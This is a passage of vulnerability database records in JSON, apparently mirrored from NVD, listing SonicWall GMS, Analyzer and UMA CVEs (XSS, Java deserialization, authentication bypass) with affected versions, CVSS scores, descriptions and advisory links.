"url": "http://www.securityfocus.com/bid/64103"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "http://www.securitytracker.com/id/1029433"
},
{
"source": "cve@mitre.org",
"tags": [
"Vendor Advisory"
],
"url": "http://www.sonicwall.com/us/shared/download/Support_Bulletin_GMS_Vulnerability_Hotfix_134235.pdf"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit"
],
"url": "http://www.vulnerability-lab.com/get_content.php?id=1099"
},
{
"source": "cve@mitre.org",
"tags": [
"VDB Entry"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/89462"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "http://archives.neohapsis.com/archives/bugtraq/2013-12/0022.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Broken Link"
],
"url": "http://osvdb.org/100610"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Mailing List",
"Third Party Advisory"
],
"url": "http://seclists.org/fulldisclosure/2013/Dec/32"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "http://secunia.com/advisories/55923"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory",
"VDB Entry"
],
"url": "http://www.exploit-db.com/exploits/30054"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory",
"VDB Entry"
],
"url": "http://www.securityfocus.com/bid/64103"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "http://www.securitytracker.com/id/1029433"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "http://www.sonicwall.com/us/shared/download/Support_Bulletin_GMS_Vulnerability_Hotfix_134235.pdf"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit"
],
"url": "http://www.vulnerability-lab.com/get_content.php?id=1099"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"VDB Entry"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/89462"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-79"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2018-01-14 04:29
Modified
2024-11-21 04:09
Severity ?
Summary
SonicWall Global Management System (GMS) 8.1 has XSS via the `newName` and `Name` values of the `/sgms/TreeControl` module.
References
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| sonicwall | analyzer | * | |
| sonicwall | analyzer | * | |
| sonicwall | global_management_system | * | |
| sonicwall | global_management_system | * |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:sonicwall:analyzer:*:*:*:*:*:*:*:*",
"matchCriteriaId": "7B3B63A0-27F2-48D2-B59D-529344EFDA22",
"versionEndIncluding": "7.2",
"versionStartIncluding": "7.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sonicwall:analyzer:*:*:*:*:*:*:*:*",
"matchCriteriaId": "24DCFA6F-DA37-40D7-8F89-1196B8C100E0",
"versionEndIncluding": "8.4",
"versionStartIncluding": "8.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sonicwall:global_management_system:*:*:*:*:*:*:*:*",
"matchCriteriaId": "77F25B0D-FBE2-41DC-8732-E54595E3741C",
"versionEndIncluding": "7.2",
"versionStartIncluding": "7.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sonicwall:global_management_system:*:*:*:*:*:*:*:*",
"matchCriteriaId": "F92C62C3-DB42-4E9C-B8CF-F90E7557A4F7",
"versionEndIncluding": "8.4",
"versionStartIncluding": "8.1",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "SonicWall Global Management System (GMS) 8.1 has XSS via the `newName` and `Name` values of the `/sgms/TreeControl` module."
},
{
"lang": "es",
"value": "SonicWall Global Management System (GMS) 8.1 tiene XSS mediante los valores \"newName\" y \"Name\" del m\u00f3dulo \"/sgms/TreeControl\"."
}
],
"id": "CVE-2018-5691",
"lastModified": "2024-11-21T04:09:10.757",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "LOW",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "NONE",
"baseScore": 3.5,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 6.8,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
},
"exploitabilityScore": 2.3,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2018-01-14T04:29:00.287",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Broken Link"
],
"url": "http://documents.software.dell.com/sonicwall-gms-os/8.2/release-notes/known-issues?ParentProduct=867"
},
{
"source": "cve@mitre.org",
"tags": [
"Vendor Advisory"
],
"url": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2018-0003"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://www.vulnerability-lab.com/get_content.php?id=1819"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Broken Link"
],
"url": "http://documents.software.dell.com/sonicwall-gms-os/8.2/release-notes/known-issues?ParentProduct=867"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2018-0003"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://www.vulnerability-lab.com/get_content.php?id=1819"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-79"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2014-02-14 16:55
Modified
2024-11-21 02:01
Severity ?
Summary
Cross-site scripting (XSS) vulnerability in mainPage in Dell SonicWALL GMS before 7.1 SP2, SonicWALL Analyzer before 7.1 SP2, and SonicWALL UMA E5000 before 7.1 SP2 might allow remote attackers to inject arbitrary web script or HTML via the node_id parameter in a ScreenDisplayManager genNetwork action.
References
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| sonicwall | global_management_system | 7.0 | |
| sonicwall | global_management_system | 7.1 | |
| sonicwall | global_management_system | 7.1 | |
| sonicwall | uma_e5000 | - | |
| sonicwall | analyzer | 7.0 | |
| sonicwall | analyzer | 7.1 | |
| sonicwall | analyzer | 7.1 | |
| sonicwall | global_management_system | 7.0 | |
| sonicwall | global_management_system | 7.1 | |
| sonicwall | global_management_system | 7.1 |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:sonicwall:global_management_system:7.0:*:*:*:*:*:*:*",
"matchCriteriaId": "CEF95BB8-DF0B-4131-8A89-82DE559CC09B",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sonicwall:global_management_system:7.1:*:*:*:*:*:*:*",
"matchCriteriaId": "AF555F86-D3E0-4763-9E9A-C26D5C986FC4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sonicwall:global_management_system:7.1:sp1:*:*:*:*:*:*",
"matchCriteriaId": "418595FE-EBFA-4B1D-A479-171BBD56279A",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:sonicwall:uma_e5000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "D8F6C2F1-8C1A-4BAD-8F49-464258B09354",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:sonicwall:analyzer:7.0:*:*:*:*:*:*:*",
"matchCriteriaId": "7A9ABA5C-59AF-496A-B22E-0C88892EC8FD",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sonicwall:analyzer:7.1:*:*:*:*:*:*:*",
"matchCriteriaId": "8078DCDB-FC88-41C8-BE14-688B5F4911E1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sonicwall:analyzer:7.1:sp1:*:*:*:*:*:*",
"matchCriteriaId": "19E54EA9-F9F8-47FA-9F31-C05C2AE59539",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:sonicwall:global_management_system:7.0:*:*:*:*:*:*:*",
"matchCriteriaId": "CEF95BB8-DF0B-4131-8A89-82DE559CC09B",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sonicwall:global_management_system:7.1:*:*:*:*:*:*:*",
"matchCriteriaId": "AF555F86-D3E0-4763-9E9A-C26D5C986FC4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sonicwall:global_management_system:7.1:sp1:*:*:*:*:*:*",
"matchCriteriaId": "418595FE-EBFA-4B1D-A479-171BBD56279A",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Cross-site scripting (XSS) vulnerability in mainPage in Dell SonicWALL GMS before 7.1 SP2, SonicWALL Analyzer before 7.1 SP2, and SonicWALL UMA E5000 before 7.1 SP2 might allow remote attackers to inject arbitrary web script or HTML via the node_id parameter in a ScreenDisplayManager genNetwork action."
},
{
"lang": "es",
"value": "Vulnerabilidad de XSS en mainPage en Dell SonicWALL GMS anterior a 7.1 SP2, SonicWALL Analyzer anterior a 7.1 SP2 y SonicWALL UMA E5000 anterior a 7.1 SP2 podr\u00eda permitir a atacantes remotos inyectar script Web o HTML arbitrarios a trav\u00e9s del par\u00e1metro node_id en una acci\u00f3n ScreenDisplayManager genNetwork."
}
],
"id": "CVE-2014-0332",
"lastModified": "2024-11-21T02:01:53.810",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
]
},
"published": "2014-02-14T16:55:08.030",
"references": [
{
"source": "cret@cert.org",
"tags": [
"Broken Link"
],
"url": "http://osvdb.org/103216"
},
{
"source": "cret@cert.org",
"tags": [
"Third Party Advisory",
"US Government Resource"
],
"url": "http://www.kb.cert.org/vuls/id/727318"
},
{
"source": "cret@cert.org",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "http://www.securityfocus.com/bid/65498"
},
{
"source": "cret@cert.org",
"tags": [
"Vendor Advisory"
],
"url": "http://www.sonicwall.com/us/shared/download/Support_Bulletin_GMS_Vulnerability_XSS_Resolved_in_7.1_SP2_and_7.2.pdf"
},
{
"source": "cret@cert.org",
"tags": [
"VDB Entry"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/91062"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Broken Link"
],
"url": "http://osvdb.org/103216"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory",
"US Government Resource"
],
"url": "http://www.kb.cert.org/vuls/id/727318"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "http://www.securityfocus.com/bid/65498"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "http://www.sonicwall.com/us/shared/download/Support_Bulletin_GMS_Vulnerability_XSS_Resolved_in_7.1_SP2_and_7.2.pdf"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"VDB Entry"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/91062"
}
],
"sourceIdentifier": "cret@cert.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-79"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2016-02-17 15:59
Modified
2024-11-21 02:48
Severity ?
Summary
The cliserver implementation in Dell SonicWALL GMS, Analyzer, and UMA EM5000 7.2, 8.0, and 8.1 before Hotfix 168056 allows remote attackers to deserialize and execute arbitrary Java code via crafted XML data.
References
| ▼ | URL | Tags | |
|---|---|---|---|
| cve@mitre.org | http://www.securitytracker.com/id/1035015 | Third Party Advisory, VDB Entry | |
| cve@mitre.org | http://www.zerodayinitiative.com/advisories/ZDI-16-163 | Third Party Advisory | |
| cve@mitre.org | https://support.software.dell.com/product-notification/185943 | Vendor Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | http://www.securitytracker.com/id/1035015 | Third Party Advisory, VDB Entry | |
| af854a3a-2127-422b-91ae-364da2661108 | http://www.zerodayinitiative.com/advisories/ZDI-16-163 | Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://support.software.dell.com/product-notification/185943 | Vendor Advisory |
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| sonicwall | uma_em5000_firmware | 7.2 | |
| sonicwall | uma_em5000_firmware | 8.0 | |
| sonicwall | uma_em5000_firmware | 8.1 | |
| sonicwall | uma_em5000 | - | |
| sonicwall | analyzer | 7.2 | |
| sonicwall | analyzer | 8.0 | |
| sonicwall | analyzer | 8.1 | |
| sonicwall | global_management_system | 7.2 | |
| sonicwall | global_management_system | 8.0 | |
| sonicwall | global_management_system | 8.1 |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:sonicwall:uma_em5000_firmware:7.2:*:*:*:*:*:*:*",
"matchCriteriaId": "94D32881-3205-40C9-9099-D517DDD0E85F",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:sonicwall:uma_em5000_firmware:8.0:*:*:*:*:*:*:*",
"matchCriteriaId": "4AC08F8A-B838-4878-A599-8FBD69EAF28E",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:sonicwall:uma_em5000_firmware:8.1:*:*:*:*:*:*:*",
"matchCriteriaId": "34AECE24-76B8-4EEB-9018-F3C35FEE6A00",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:sonicwall:uma_em5000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "23315AEF-29C1-4A58-A933-2A4305123D7F",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:sonicwall:analyzer:7.2:*:*:*:*:*:*:*",
"matchCriteriaId": "05DC3043-D6B1-4863-AE06-FAC32F94091B",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sonicwall:analyzer:8.0:*:*:*:*:*:*:*",
"matchCriteriaId": "59AE4366-0EF5-4DD9-B533-1101AB06FC0E",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sonicwall:analyzer:8.1:*:*:*:*:*:*:*",
"matchCriteriaId": "B30D6D7E-63DA-49F9-A904-FAC2C40B4B72",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sonicwall:global_management_system:7.2:*:*:*:*:*:*:*",
"matchCriteriaId": "C91AE401-839F-4B95-AC84-12D003B0CF59",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sonicwall:global_management_system:8.0:*:*:*:*:*:*:*",
"matchCriteriaId": "E119AFF9-BAB9-42BA-AF89-A0C59DC4D4F4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sonicwall:global_management_system:8.1:*:*:*:*:*:*:*",
"matchCriteriaId": "36989FC7-3390-455E-8F7E-E3C4EB29D812",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "The cliserver implementation in Dell SonicWALL GMS, Analyzer, and UMA EM5000 7.2, 8.0, and 8.1 before Hotfix 168056 allows remote attackers to deserialize and execute arbitrary Java code via crafted XML data."
},
{
"lang": "es",
"value": "La implementaci\u00f3n de cliserver en Dell SonicWALL GMS, Analyzer y UMA EM5000 7.2, 8.0 y 8.1 en versiones anteriores a Hotfix 168056 permite a atacantes remotos deserializar y ejecutar c\u00f3digo Java arbitrario a trav\u00e9s de datos XML manipulados."
}
],
"id": "CVE-2016-2397",
"lastModified": "2024-11-21T02:48:23.100",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"integrityImpact": "COMPLETE",
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
"exploitabilityScore": 10.0,
"impactScore": 10.0,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2016-02-17T15:59:07.690",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "http://www.securitytracker.com/id/1035015"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "http://www.zerodayinitiative.com/advisories/ZDI-16-163"
},
{
"source": "cve@mitre.org",
"tags": [
"Vendor Advisory"
],
"url": "https://support.software.dell.com/product-notification/185943"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "http://www.securitytracker.com/id/1035015"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "http://www.zerodayinitiative.com/advisories/ZDI-16-163"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "https://support.software.dell.com/product-notification/185943"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-77"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2014-07-24 14:55
Modified
2024-11-21 02:11
Severity ?
Summary
Cross-site scripting (XSS) vulnerability in sgms/panelManager in Dell SonicWALL GMS, Analyzer, and UMA before 7.2 SP1 allows remote attackers to inject arbitrary web script or HTML via the node_id parameter.
References
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| sonicwall | analyzer | * | |
| sonicwall | global_management_system | * | |
| sonicwall | uma_em5000 | - |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:sonicwall:analyzer:*:*:*:*:*:*:*:*",
"matchCriteriaId": "BB379556-F957-439C-8644-DFD96C9BBE8D",
"versionEndIncluding": "7.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sonicwall:global_management_system:*:*:*:*:*:*:*:*",
"matchCriteriaId": "E8DADDE6-6E5A-4C12-8B37-C9A173B05481",
"versionEndIncluding": "7.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:h:sonicwall:uma_em5000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "23315AEF-29C1-4A58-A933-2A4305123D7F",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Cross-site scripting (XSS) vulnerability in sgms/panelManager in Dell SonicWALL GMS, Analyzer, and UMA before 7.2 SP1 allows remote attackers to inject arbitrary web script or HTML via the node_id parameter."
},
{
"lang": "es",
"value": "Vulnerabilidad de XSS en sgms/panelManager en Dell SonicWALL GMS, Analyzer y UMA anterior a 7.2 SP1 permite a atacantes remotos inyectar secuencias de comandos web o HTML arbitrario a trav\u00e9s del par\u00e1metro node_id."
}
],
"id": "CVE-2014-5024",
"lastModified": "2024-11-21T02:11:18.413",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
]
},
"published": "2014-07-24T14:55:09.910",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory",
"VDB Entry"
],
"url": "http://packetstormsecurity.com/files/127575/SonicWALL-GMS-7.2-Build-7221.1701-Cross-Site-Scripting.html"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Mailing List",
"Third Party Advisory"
],
"url": "http://seclists.org/fulldisclosure/2014/Jul/125"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "http://secunia.com/advisories/60287"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory",
"VDB Entry"
],
"url": "http://www.securityfocus.com/bid/68829"
},
{
"source": "cve@mitre.org",
"tags": [
"Vendor Advisory"
],
"url": "https://support.software.dell.com/product-notification/128245"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory",
"VDB Entry"
],
"url": "http://packetstormsecurity.com/files/127575/SonicWALL-GMS-7.2-Build-7221.1701-Cross-Site-Scripting.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Mailing List",
"Third Party Advisory"
],
"url": "http://seclists.org/fulldisclosure/2014/Jul/125"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "http://secunia.com/advisories/60287"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory",
"VDB Entry"
],
"url": "http://www.securityfocus.com/bid/68829"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "https://support.software.dell.com/product-notification/128245"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-79"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2020-02-11 16:15
Modified
2024-11-21 01:49
Severity ?
Summary
An Authentication Bypass vulnerability exists in DELL SonicWALL Global Management System (GMS) 4.1, 5.0, 5.1, 6.0, and 7.0, Analyzer 7.0, Universal Management Appliance (UMA) 5.1, 6.0, and 7.0 and ViewPoint 4.1, 5.0, and 6.0 via a crafted request to the SGMS interface, which could let a remote malicious user obtain administrative access.
References
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| sonicwall | analyzer | 7.0 | |
| sonicwall | global_management_system | 4.1 | |
| sonicwall | global_management_system | 5.0 | |
| sonicwall | global_management_system | 5.1 | |
| sonicwall | global_management_system | 6.0 | |
| sonicwall | global_management_system | 7.0 | |
| sonicwall | universal_management_appliance | 5.1 | |
| sonicwall | universal_management_appliance | 6.0 | |
| sonicwall | universal_management_appliance | 7.0 | |
| sonicwall | viewpoint | 4.1 | |
| sonicwall | viewpoint | 5.0 | |
| sonicwall | viewpoint | 6.0 |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:sonicwall:analyzer:7.0:*:*:*:*:*:*:*",
"matchCriteriaId": "7A9ABA5C-59AF-496A-B22E-0C88892EC8FD",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sonicwall:global_management_system:4.1:*:*:*:*:*:*:*",
"matchCriteriaId": "3627733D-E0CD-4E00-8D36-AB4EF784977C",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sonicwall:global_management_system:5.0:*:*:*:*:*:*:*",
"matchCriteriaId": "60563570-4865-4D8B-9E24-A371CABE1BFE",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sonicwall:global_management_system:5.1:*:*:*:*:*:*:*",
"matchCriteriaId": "B2EFEF89-357C-4EC2-B6A3-C803E64A2227",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sonicwall:global_management_system:6.0:*:*:*:*:*:*:*",
"matchCriteriaId": "CE35F845-3A01-4974-BD7C-88CBE759830D",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sonicwall:global_management_system:7.0:*:*:*:*:*:*:*",
"matchCriteriaId": "CEF95BB8-DF0B-4131-8A89-82DE559CC09B",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sonicwall:universal_management_appliance:5.1:*:*:*:*:*:*:*",
"matchCriteriaId": "0AC115CB-0F22-47C8-86F3-9990058896FA",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sonicwall:universal_management_appliance:6.0:*:*:*:*:*:*:*",
"matchCriteriaId": "160BD653-09A8-4939-9A5D-8EED7B5B4D78",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sonicwall:universal_management_appliance:7.0:*:*:*:*:*:*:*",
"matchCriteriaId": "747153CA-2225-40A3-9C21-E9E62C24892B",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sonicwall:viewpoint:4.1:*:*:*:*:*:*:*",
"matchCriteriaId": "FE97B72B-31B2-4E2D-99EE-81A1C645CDF4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sonicwall:viewpoint:5.0:*:*:*:*:*:*:*",
"matchCriteriaId": "28C845AC-8B12-4147-A5D7-9D5E4C7953EB",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sonicwall:viewpoint:6.0:*:*:*:*:*:*:*",
"matchCriteriaId": "1589B409-1AF8-4789-90C3-6E1DFA14677E",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "An Authentication Bypass vulnerability exists in DELL SonicWALL Global Management System (GMS) 4.1, 5.0, 5.1, 6.0, and 7.0, Analyzer 7.0, Universal Management Appliance (UMA) 5.1, 6.0, and 7.0 and ViewPoint 4.1, 5.0, and 6.0 via a crafted request to the SGMS interface, which could let a remote malicious user obtain administrative access."
},
{
"lang": "es",
"value": "Se presenta una vulnerabilidad de Omisi\u00f3n de Autenticaci\u00f3n en DELL SonicWALL Global Management System (GMS) versiones 4.1, 5.0, 5.1, 6.0 y 7.0, Analyzer versi\u00f3n 7.0, Universal Management Appliance (UMA) versiones 5.1, 6.0 y 7.0 y ViewPoint versiones 4.1, 5.0 y 6.0, por medio de una petici\u00f3n dise\u00f1ada en la interfaz SGMS, que podr\u00eda permitir a un usuario malicioso remoto obtener acceso administrativo."
}
],
"id": "CVE-2013-1360",
"lastModified": "2024-11-21T01:49:25.667",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"integrityImpact": "COMPLETE",
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
"exploitabilityScore": 10.0,
"impactScore": 10.0,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV31": [
{
"cvssData": {
